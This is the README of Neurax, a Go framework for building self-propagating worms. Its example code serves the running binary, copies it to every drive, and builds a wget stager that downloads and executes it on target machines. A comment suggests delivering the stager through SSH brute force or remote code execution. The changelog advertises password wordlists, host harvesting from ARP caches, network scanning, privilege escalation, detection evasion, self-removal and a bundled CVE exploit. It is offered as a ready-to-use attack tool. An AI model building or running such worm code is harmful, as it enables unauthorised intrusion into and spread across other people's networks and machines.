A framework that aids in creation of self-spreading software
Overview
With help of Neurax, Golang binaries can spread on LAN/WAN without using any external servers.
Diverse config options and command stagers allow rapid propagation across various wireless environments.
Example code
package main
import . "github.com/redcode-labs/Neurax"
func main(){
//Specify serving port and stager to use
Nrx.Config.Port = 5555
Nrx.Config.Stager = "wget"
//Start a server that exposes the current binary in the background
go NeuraxServer()
//Copy current binary to all logical drives
NeuraxDisks()
//Create a command stager that should be launched on target machine
//It will download, decode and execute the binary
cmd_stager := NeuraxStager()
/* Now you have to somehow execute the command generated above.
You can use SSH bruteforce, some RCE or whatever else you want ;> */
}
New in v. 2.X (separate sub-project)
- Refactor: abandoned framework-like approach in favour of a ready-to-use binary
- Generic wget stager for all UNIX targets
- Single config file to tweak worm's behaviour on the fly
- Automatic self-removal via
unlinkat(2)
- Example LinuxKI CVE exploit to supplement network spreading capabilities
- JSON config file is downloaded and evaluated
- Minimalistic re-write of host harvester
New in v. 2.5
- Optional background execution of the second-stage binary (
N.StagerBg)
- Command stager saves and executes in context-local path
- It also removes the downloaded binary right after successful execution
- Removed synchronized command execution mechanism for speed/stability reasons.
I will come up with a decent alternative prior to next release.
N.NoInfectCheck to disable checking if host is already infected.
- Single-execution policy on target machine, enforced with an exclusive file mutex placed inside
NeuraxServer().
- Added a nested goroutine for serving the binary
- New
httrack stager for Linux
- Commented-out common wordlist for detection evasion
- Command stager can wait before removing the binary (
N.StagerRemovalDelay)
New in v. 2.0
- New wordlist mutators + common passwords by country
- Improvised passive scanning
.FastScan option that makes active scans a bit quicker
- Wordlists are created strictly in-memory
NeuraxScan() accepts a callback function instead of channel as an argument.
NeuraxScan() scans in infinite loop with possibility to set interval between each scan of whole subnet/pool of targets
- Reverse-DNS lookup for targets that are not in IP format
- Extraction of target candidates from ARP cache
- Possibility to scan only a selected list of targets + prioritizing specific targets (such as default gateways)
- Possibility to specify interface and timeout when using passive network scan.
- Improved command stager (can be optionally executed with elevated privileges / multiple times)
- Few changes of options' names
NeuraxConfig. became N. (cause it's shorter to type)
- Functions for random memory allocation + binary migration
- Possibility to chain multiple stagers (ex.
wget + curl)
- Volume and complexity of created wordlist can be easily tuned (with options such as
.WordlistExpand)
- Possibility to set time-to-live of created binary
List of config entries